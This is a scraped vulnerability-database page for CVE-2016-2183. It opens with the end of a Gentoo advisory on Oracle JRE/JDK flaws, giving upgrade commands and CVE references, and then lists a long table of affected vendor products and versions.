SE) lets you develop and deploy Java applications on desktops and servers, as well as in today's demanding embedded environments. Java offers the rich user interface, performance, versatility, portability, and security that today's applications require. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-java/oracle-jre-bin < 1.8.0.121 >= 1.8.0.121 2 dev-java/oracle-jdk-bin < 1.8.0.121 >= 1.8.0.121 ------------------------------------------------------------------- 2 affected packages Description =========== Multiple vulnerabilities have been discovered in in Oracle's JRE and JDK. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Oracle JRE users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jre-bin-1.8.0.121" All Oracle JDK users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jdk-bin-1.8.0.121" References ========== [ 1 ] CVE-2016-2183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183 [ 2 ] CVE-2016-5546 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5546 [ 3 ] CVE-2016-5547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5547 [ 4 ] CVE-2016-5548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5548 [ 5 ] CVE-2016-5549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5549 [ 6 ] CVE-2016-5552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5552 [ 7 ] CVE-2016-8328 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-8328 [ 8 ] CVE-2017-3231 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3231 [ 9 ] CVE-2017-3241 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3241 [ 10 ] CVE-2017-3252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3252 [ 11 ] CVE-2017-3253 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3253 [ 12 ] CVE-2017-3259 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3259 [ 13 ] CVE-2017-3260 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3260 [ 14 ] CVE-2017-3261 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3261 [ 15 ] CVE-2017-3262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3262 [ 16 ] CVE-2017-3272 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3272 [ 17 ] CVE-2017-3289 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3289 [ 18 ] Oracle Critical Patch Update Advisory - January 2017 http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.ht= ml#AppendixJAVA Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201701-65 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 --WTU590MbkrsqL77kX5fo3Ril9tU2ORoki--

Trust: 2.07

sources: NVD: CVE-2016-2183 // BID: 92630 // VULHUB: VHN-91002 // PACKETSTORM: 142452 // PACKETSTORM: 142756 // PACKETSTORM: 138817 // PACKETSTORM: 140084 // PACKETSTORM: 138889 // PACKETSTORM: 141555 // PACKETSTORM: 161320 // PACKETSTORM: 144135 // PACKETSTORM: 140725

AFFECTED PRODUCTS

vendor:	redhat	model:	enterprise linux	scope:	eq	version:	7.0	Trust: 1.0
vendor:	python	model:	python	scope:	gte	version:	2.7.0	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1p	Trust: 1.0
vendor:	redhat	model:	enterprise linux	scope:	eq	version:	6.0	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1f	Trust: 1.0
vendor:	cisco	model:	content security management appliance	scope:	eq	version:	9.7.0-006	Trust: 1.0
vendor:	nodejs	model:	node.js	scope:	gte	version:	6.0.0	Trust: 1.0
vendor:	nodejs	model:	node.js	scope:	gte	version:	0.10.0	Trust: 1.0
vendor:	redhat	model:	jboss web server	scope:	eq	version:	3.0	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1l	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1d	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1c	Trust: 1.0
vendor:	python	model:	python	scope:	lt	version:	3.4.7	Trust: 1.0
vendor:	redhat	model:	enterprise linux	scope:	eq	version:	5.0	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.2d	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1g	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.2b	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.2c	Trust: 1.0
vendor:	python	model:	python	scope:	lt	version:	2.7.13	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1q	Trust: 1.0
vendor:	nodejs	model:	node.js	scope:	lt	version:	0.10.47	Trust: 1.0
vendor:	oracle	model:	database	scope:	eq	version:	11.2.0.4	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1t	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.2e	Trust: 1.0
vendor:	nodejs	model:	node.js	scope:	lt	version:	4.1.2	Trust: 1.0
vendor:	cisco	model:	content security management appliance	scope:	eq	version:	9.6.6-068	Trust: 1.0
vendor:	nodejs	model:	node.js	scope:	gte	version:	4.0.0	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1b	Trust: 1.0
vendor:	redhat	model:	jboss enterprise application platform	scope:	eq	version:	6.0.0	Trust: 1.0
vendor:	nodejs	model:	node.js	scope:	lt	version:	0.12.16	Trust: 1.0
vendor:	python	model:	python	scope:	gte	version:	3.4.0	Trust: 1.0
vendor:	nodejs	model:	node.js	scope:	gte	version:	0.12.0	Trust: 1.0
vendor:	python	model:	python	scope:	gte	version:	3.5.0	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.2h	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1h	Trust: 1.0
vendor:	nodejs	model:	node.js	scope:	lt	version:	4.6.0	Trust: 1.0
vendor:	nodejs	model:	node.js	scope:	gte	version:	4.2.0	Trust: 1.0
vendor:	nodejs	model:	node.js	scope:	lt	version:	6.7.0	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1j	Trust: 1.0
vendor:	oracle	model:	database	scope:	eq	version:	12.1.0.2	Trust: 1.0
vendor:	redhat	model:	jboss enterprise web server	scope:	eq	version:	2.0.0	Trust: 1.0
vendor:	python	model:	python	scope:	lt	version:	3.5.3	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1o	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1e	Trust: 1.0
vendor:	redhat	model:	jboss enterprise web server	scope:	eq	version:	1.0.0	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1a	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.2f	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1i	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1r	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1k	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1n	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.2a	Trust: 1.0
vendor:	openssl	model:	openssl	scope:	eq	version:	1.0.1m	Trust: 1.0
vendor:	oracle	model:	jdk update	scope:	eq	version:	1.6131	Trust: 0.9
vendor:	oracle	model:	jdk update	scope:	eq	version:	1.7121	Trust: 0.9
vendor:	oracle	model:	jdk update	scope:	eq	version:	1.8111	Trust: 0.9
vendor:	oracle	model:	jre update	scope:	eq	version:	1.6131	Trust: 0.9
vendor:	oracle	model:	jdk update	scope:	eq	version:	1.8112	Trust: 0.9
vendor:	oracle	model:	jre update	scope:	eq	version:	1.7121	Trust: 0.9
vendor:	oracle	model:	jre update	scope:	eq	version:	1.8111	Trust: 0.9
vendor:	oracle	model:	jre update	scope:	eq	version:	1.8112	Trust: 0.9
vendor:	cisco	model:	paging server	scope:	eq	version:	0	Trust: 0.6
vendor:	ibm	model:	tivoli storage productivity center	scope:	eq	version:	5.2.10	Trust: 0.3
vendor:	cisco	model:	webex centers t32	scope:	ne	version:	-	Trust: 0.3
vendor:	hp	model:	performance center	scope:	eq	version:	12.50	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.2.0.3	Trust: 0.3
vendor:	ibm	model:	db2® workgroup server edition	scope:	eq	version:	11.1	Trust: 0.3
vendor:	cisco	model:	video surveillance series ip cameras	scope:	eq	version:	30000	Trust: 0.3
vendor:	ibm	model:	sterling connect:express for unix ifix	scope:	ne	version:	1.5.0.13150-13	Trust: 0.3
vendor:	ibm	model:	security guardium	scope:	eq	version:	9.1	Trust: 0.3
vendor:	ibm	model:	db2 direct standard edition	scope:	eq	version:	11.1	Trust: 0.3
vendor:	f5	model:	big-ip dns	scope:	eq	version:	13.0	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	13.1	Trust: 0.3
vendor:	cisco	model:	clean access manager	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	db2® connect? unlimited edition for system z®	scope:	eq	version:	10.5	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.2.0.2	Trust: 0.3
vendor:	netapp	model:	virtual storage console for vmware vsphere	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	nexus series blade switches 4.1 e1	scope:	ne	version:	4000	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	6.2.0.0	Trust: 0.3
vendor:	ibm	model:	sterling connect:express for unix	scope:	eq	version:	1.5.0.9	Trust: 0.3
vendor:	cisco	model:	telepresence content server	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	proactive network operations center	scope:	eq	version:	0	Trust: 0.3
vendor:	oracle	model:	commerce guided search	scope:	eq	version:	6.5	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	11.4.1	Trust: 0.3
vendor:	ibm	model:	db2® advanced enterprise server edition	scope:	eq	version:	11.1	Trust: 0.3
vendor:	redhat	model:	enterprise linux	scope:	eq	version:	5	Trust: 0.3
vendor:	mcafee	model:	email gateway	scope:	eq	version:	7.6	Trust: 0.3
vendor:	cisco	model:	unified ip phone	scope:	eq	version:	69010	Trust: 0.3
vendor:	f5	model:	big-ip aam	scope:	eq	version:	11.5	Trust: 0.3
vendor:	cisco	model:	anyconnect secure mobility client for linux	scope:	ne	version:	4.0.7	Trust: 0.3
vendor:	cisco	model:	ucs central software	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	eq	version:	11.5.1	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	13.0	Trust: 0.3
vendor:	cisco	model:	video surveillance media server	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	sterling connect:express for unix	scope:	eq	version:	1.5.0.13	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	eq	version:	12.1.2	Trust: 0.3
vendor:	cisco	model:	stealthwatch management console	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	communications server for data center deployment	scope:	eq	version:	7.0	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.5.4	Trust: 0.3
vendor:	ibm	model:	tivoli provisioning manager for os deployment 5.1.fix pack	scope:	eq	version:	3	Trust: 0.3
vendor:	f5	model:	big-ip psm	scope:	eq	version:	10.2.4	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.6.0	Trust: 0.3
vendor:	cisco	model:	ios and cisco ios xe software	scope:	ne	version:	16.2	Trust: 0.3
vendor:	cisco	model:	anyconnect secure mobility client for android	scope:	ne	version:	4.0.7	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.5	Trust: 0.3
vendor:	f5	model:	big-ip aam hf1	scope:	ne	version:	12.1.2	Trust: 0.3
vendor:	cisco	model:	jabber software development kit	scope:	ne	version:	11.8	Trust: 0.3
vendor:	ibm	model:	db2® express edition	scope:	eq	version:	10.1	Trust: 0.3
vendor:	f5	model:	big-ip asm hf1	scope:	ne	version:	13.0	Trust: 0.3
vendor:	netapp	model:	data ontap 7-mode	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	computer telephony integration object server	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified workforce optimization	scope:	eq	version:	0	Trust: 0.3
vendor:	redhat	model:	enterprise linux for power big endian extended update support	scope:	eq	version:	-7.5	Trust: 0.3
vendor:	f5	model:	linerate	scope:	eq	version:	2.6.1	Trust: 0.3
vendor:	cisco	model:	industrial router 1.2.1rb4	scope:	ne	version:	910	Trust: 0.3
vendor:	f5	model:	firepass	scope:	eq	version:	7.0	Trust: 0.3
vendor:	python	model:	software foundation python	scope:	ne	version:	3.6	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.5.0.1	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6	Trust: 0.3
vendor:	ibm	model:	java sdk	scope:	ne	version:	6.0.16.41	Trust: 0.3
vendor:	ibm	model:	powerkvm	scope:	eq	version:	3.1	Trust: 0.3
vendor:	ibm	model:	db2® connect? application server edition	scope:	eq	version:	10.5	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.7.14	Trust: 0.3
vendor:	ibm	model:	sonas	scope:	eq	version:	1.5.2.0	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	eq	version:	11.5.4	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.6.1	Trust: 0.3
vendor:	cisco	model:	ip interoperability and collaboration system	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	asr series	scope:	eq	version:	50000	Trust: 0.3
vendor:	cisco	model:	virtualization experience media edition	scope:	ne	version:	11.8	Trust: 0.3
vendor:	cisco	model:	edge digital media player	scope:	eq	version:	3400	Trust: 0.3
vendor:	ibm	model:	java sdk	scope:	ne	version:	7.1.4.1	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	eq	version:	12.1.0	Trust: 0.3
vendor:	redhat	model:	enterprise linux workstation	scope:	eq	version:	7	Trust: 0.3
vendor:	hp	model:	integrated lights-out	scope:	eq	version:	42.20	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	eq	version:	11.6.0	Trust: 0.3
vendor:	cisco	model:	unified contact center enterprise	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	nexus series switches standalone nx-os mode	scope:	eq	version:	9000-0	Trust: 0.3
vendor:	ibm	model:	security network protection	scope:	ne	version:	5.3.3.1	Trust: 0.3
vendor:	cisco	model:	nexus series switches standalone nx-os mode 7.0 i5	scope:	ne	version:	9000-	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	5.0.11	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	ne	version:	13.0.1	Trust: 0.3
vendor:	mcafee	model:	epolicy orchestrator	scope:	eq	version:	5.1.2	Trust: 0.3
vendor:	cisco	model:	nexus series switches 5.2.8	scope:	ne	version:	7000	Trust: 0.3
vendor:	ibm	model:	db2 direct advanced edition	scope:	eq	version:	10.1	Trust: 0.3
vendor:	f5	model:	big-iq device	scope:	eq	version:	4.5	Trust: 0.3
vendor:	cisco	model:	anyconnect secure mobility client for desktop platforms	scope:	eq	version:	0	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.26	Trust: 0.3
vendor:	redhat	model:	enterprise linux server extended update support	scope:	eq	version:	-7.6	Trust: 0.3
vendor:	ibm	model:	cognos business intelligence server	scope:	eq	version:	10.1.1	Trust: 0.3
vendor:	hp	model:	loadrunner	scope:	eq	version:	12.53.0	Trust: 0.3
vendor:	ibm	model:	smartcloud entry appliance fi	scope:	eq	version:	2.2.0.4	Trust: 0.3
vendor:	f5	model:	big-iq device	scope:	eq	version:	4.2	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	ne	version:	4.6.0.0	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.5.0	Trust: 0.3
vendor:	f5	model:	big-ip afm hf1	scope:	ne	version:	13.0	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	12.0	Trust: 0.3
vendor:	cisco	model:	jabber guest	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.4.1	Trust: 0.3
vendor:	cisco	model:	prime license manager	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	video surveillance ptz ip cameras	scope:	ne	version:	2.9	Trust: 0.3
vendor:	cisco	model:	series digital media players 5.3.6 rb3	scope:	ne	version:	4300	Trust: 0.3
vendor:	cisco	model:	stealthwatch flowcollector sflow	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	eq	version:	12.1.3	Trust: 0.3
vendor:	cisco	model:	web security appliance	scope:	eq	version:	0	Trust: 0.3
vendor:	hp	model:	loadrunner	scope:	eq	version:	12.01	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	6.1.0.0	Trust: 0.3
vendor:	cisco	model:	visual quality experience server	scope:	eq	version:	0	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.7.11	Trust: 0.3
vendor:	oracle	model:	commerce guided search	scope:	eq	version:	6.2.2	Trust: 0.3
vendor:	netapp	model:	data ontap powershell toolkit	scope:	eq	version:	0	Trust: 0.3
vendor:	netapp	model:	clustered data ontap	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	db2® connect? unlimited edition for system i®	scope:	eq	version:	10.1	Trust: 0.3
vendor:	f5	model:	big-ip aam	scope:	eq	version:	11.5.7	Trust: 0.3
vendor:	cisco	model:	content security management appliance	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	agent for openflow	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	video surveillance series ip cameras	scope:	ne	version:	60002.9	Trust: 0.3
vendor:	cisco	model:	prime collaboration provisioning	scope:	ne	version:	11.6	Trust: 0.3
vendor:	oracle	model:	commerce experience manager	scope:	eq	version:	6.3	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.5.2.4	Trust: 0.3
vendor:	mcafee	model:	email gateway	scope:	eq	version:	7.6.2	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	5.0.8	Trust: 0.3
vendor:	hp	model:	performance center patch	scope:	eq	version:	12.013	Trust: 0.3
vendor:	ibm	model:	rational insight	scope:	eq	version:	1.1.1	Trust: 0.3
vendor:	cisco	model:	ons series multiservice provisioning platforms	scope:	eq	version:	154540	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.15	Trust: 0.3
vendor:	cisco	model:	anyconnect secure mobility client for desktop platforms	scope:	ne	version:	4.4	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.5.4	Trust: 0.3
vendor:	cisco	model:	telepresence sx series ce8.2.2	scope:	ne	version:	-	Trust: 0.3
vendor:	f5	model:	big-iq device	scope:	eq	version:	4.4	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	eq	version:	11.5	Trust: 0.3
vendor:	cisco	model:	prime collaboration assurance	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	asa next-generation firewall services	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.5.3	Trust: 0.3
vendor:	f5	model:	big-ip websafe	scope:	ne	version:	11.6.2	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.4	Trust: 0.3
vendor:	cisco	model:	email security appliance	scope:	ne	version:	10.0.1	Trust: 0.3
vendor:	hp	model:	loadrunner build	scope:	eq	version:	8.1.0.01735	Trust: 0.3
vendor:	cisco	model:	telepresence server on multiparty media	scope:	eq	version:	8200	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	13.0	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.5.2	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.7.9	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	eq	version:	11.6.2	Trust: 0.3
vendor:	hp	model:	integrated lights-out	scope:	eq	version:	42.10	Trust: 0.3
vendor:	f5	model:	big-ip aam	scope:	eq	version:	13.1	Trust: 0.3
vendor:	cisco	model:	unified communications manager im & presence service (formerly c	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ios and cisco ios xe software	scope:	ne	version:	16.3	Trust: 0.3
vendor:	redhat	model:	enterprise linux server tus	scope:	eq	version:	7.6	Trust: 0.3
vendor:	hp	model:	integrated lights-out	scope:	eq	version:	41.11	Trust: 0.3
vendor:	ibm	model:	security network protection	scope:	eq	version:	5.3.1.5	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.6.1	Trust: 0.3
vendor:	cisco	model:	webex meetings for blackberry	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	11.2.1	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	ne	version:	14.0	Trust: 0.3
vendor:	f5	model:	big-ip pem	scope:	eq	version:	11.5.6	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.1.0.20	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.5.1	Trust: 0.3
vendor:	pexip	model:	infinity	scope:	eq	version:	9	Trust: 0.3
vendor:	pexip	model:	infinity	scope:	eq	version:	10.1	Trust: 0.3
vendor:	f5	model:	big-ip dns	scope:	eq	version:	12.1.2	Trust: 0.3
vendor:	f5	model:	big-ip aam	scope:	eq	version:	13.0	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.5.3	Trust: 0.3
vendor:	cisco	model:	wide area application services	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	11.5.7	Trust: 0.3
vendor:	pexip	model:	infinity	scope:	eq	version:	10.2	Trust: 0.3
vendor:	ibm	model:	security virtual server protection for vmware	scope:	eq	version:	1.1.0.1	Trust: 0.3
vendor:	hp	model:	loadrunner	scope:	eq	version:	9.0.0.0	Trust: 0.3
vendor:	ibm	model:	db2® express edition	scope:	eq	version:	11.1	Trust: 0.3
vendor:	pexip	model:	infinity	scope:	eq	version:	10	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.5.2	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.5.0.2	Trust: 0.3
vendor:	cisco	model:	firesight system software	scope:	ne	version:	6.0.1.3	Trust: 0.3
vendor:	ibm	model:	communications server for linux on system z	scope:	eq	version:	6.4	Trust: 0.3
vendor:	cisco	model:	anyconnect secure mobility client for mac os	scope:	ne	version:	x4.0.7	Trust: 0.3
vendor:	cisco	model:	common services platform collector	scope:	ne	version:	1.11	Trust: 0.3
vendor:	ibm	model:	cognos business intelligence server	scope:	eq	version:	10.2.1	Trust: 0.3
vendor:	ibm	model:	db2® connect? unlimited edition for system z®	scope:	eq	version:	9.7	Trust: 0.3
vendor:	f5	model:	big-ip ltm	scope:	eq	version:	11.5.1	Trust: 0.3
vendor:	f5	model:	big-ip edge gateway	scope:	eq	version:	10.2.3	Trust: 0.3
vendor:	cisco	model:	partner support service	scope:	eq	version:	1.0	Trust: 0.3
vendor:	cisco	model:	media services interface	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip link controller	scope:	eq	version:	12.1.1	Trust: 0.3
vendor:	ibm	model:	db2® connect? enterprise edition	scope:	eq	version:	10.5	Trust: 0.3
vendor:	python	model:	software foundation python	scope:	eq	version:	2.7.1	Trust: 0.3
vendor:	oracle	model:	mysql	scope:	eq	version:	5.6.9	Trust: 0.3
vendor:	mcafee	model:	epolicy orchestrator	scope:	eq	version:	5.1.3	Trust: 0.3
vendor:	ibm	model:	security guardium	scope:	eq	version:	9.5	Trust: 0.3
vendor:	hp	model:	real user monitor software series	scope:	eq	version:	9.2	Trust: 0.3
vendor:	f5	model:	traffix sdc	scope:	eq	version:	4.3	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.6.2	Trust: 0.3
vendor:	cisco	model:	jabber for iphone and ipad	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	cloud web security	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	prime collaboration assurance	scope:	ne	version:	11.6	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	5.0	Trust: 0.3
vendor:	mcafee	model:	email gateway 7.6.2h968406	scope:	-	version:	-	Trust: 0.3
vendor:	cisco	model:	unified attendant console advanced	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip afm	scope:	eq	version:	11.5.7	Trust: 0.3
vendor:	cisco	model:	common services platform collector	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	anyconnect secure mobility client for windows	scope:	eq	version:	0	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	13.1	Trust: 0.3
vendor:	f5	model:	big-ip asm hf1	scope:	ne	version:	12.1.2	Trust: 0.3
vendor:	cisco	model:	telepresence mx series ce8.2.2	scope:	ne	version:	-	Trust: 0.3
vendor:	ibm	model:	tivoli provisioning manager for os deployment	scope:	eq	version:	5.1	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.5.6	Trust: 0.3
vendor:	ibm	model:	db2 direct advanced edition	scope:	eq	version:	11.1	Trust: 0.3
vendor:	ibm	model:	spectrum control	scope:	eq	version:	5.2.8	Trust: 0.3
vendor:	cisco	model:	webex meetings client on-premises	scope:	eq	version:	-0	Trust: 0.3
vendor:	cisco	model:	unified intelligence center	scope:	ne	version:	11.6(1)	Trust: 0.3
vendor:	hp	model:	performance center agent fp1	scope:	eq	version:	8.1	Trust: 0.3
vendor:	hp	model:	integrated lights-out	scope:	eq	version:	41.22	Trust: 0.3
vendor:	cisco	model:	services provisioning platform	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	ucs b-series blade servers	scope:	ne	version:	3.1.3	Trust: 0.3
vendor:	cisco	model:	nac appliance clean access manager	scope:	eq	version:	-0	Trust: 0.3
vendor:	ibm	model:	storwize unified	scope:	eq	version:	v70001.5.0.0	Trust: 0.3
vendor:	f5	model:	big-ip websafe	scope:	ne	version:	12.1	Trust: 0.3
vendor:	ibm	model:	sterling connect:express for unix	scope:	eq	version:	1.4.6	Trust: 0.3
vendor:	cisco	model:	telepresence system	scope:	eq	version:	10000	Trust: 0.3
vendor:	python	model:	software foundation python	scope:	ne	version:	3.5.3	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	7.2	Trust: 0.3
vendor:	f5	model:	traffix sdc	scope:	eq	version:	5.0	Trust: 0.3
vendor:	ibm	model:	tivoli provisioning manager for os deployment build	scope:	ne	version:	7.1.1.20290.1	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	13.0	Trust: 0.3
vendor:	cisco	model:	jabber for android	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	asa next-generation firewall services	scope:	ne	version:	2.1.2	Trust: 0.3
vendor:	netapp	model:	ef-series santricity storage manager	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	mobilefirst platform foundation	scope:	eq	version:	6.3.0.0	Trust: 0.3
vendor:	mcafee	model:	email gateway	scope:	eq	version:	7.6.405	Trust: 0.3
vendor:	f5	model:	iworkflow	scope:	eq	version:	2.0.1	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	10.2.2	Trust: 0.3
vendor:	oracle	model:	api gateway	scope:	eq	version:	11.1.2.4.0	Trust: 0.3
vendor:	f5	model:	big-ip asm	scope:	eq	version:	10.2.40	Trust: 0.3
vendor:	f5	model:	big-ip apm	scope:	eq	version:	11.6.3	Trust: 0.3
vendor:	oracle	model:	commerce experience manager	scope:	eq	version:	6.5	Trust: 0.3
vendor:	f5	model:	big-ip gtm	scope:	eq	version:	11.6.2	Trust: 0.3
vendor:	cisco	model:	unified attendant console premium edition	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	db2® connect? unlimited edition for system i®	scope:	eq	version:	11.1	Trust: 0.3
vendor:	cisco	model:	services provisioning platform sfp1.1	scope:	ne	version:	-	Trust: 0.3
vendor:	ibm	model:	sdk for node.js	scope:	eq	version:	1.1.0.7	Trust: 0.3
vendor:	f5	model:	big-ip analytics	scope:	eq	version:	11.2.1	Trust: 0.3
vendor:	hp	model:	loadrunner	scope:	eq	version:	12.50	Trust: 0.3
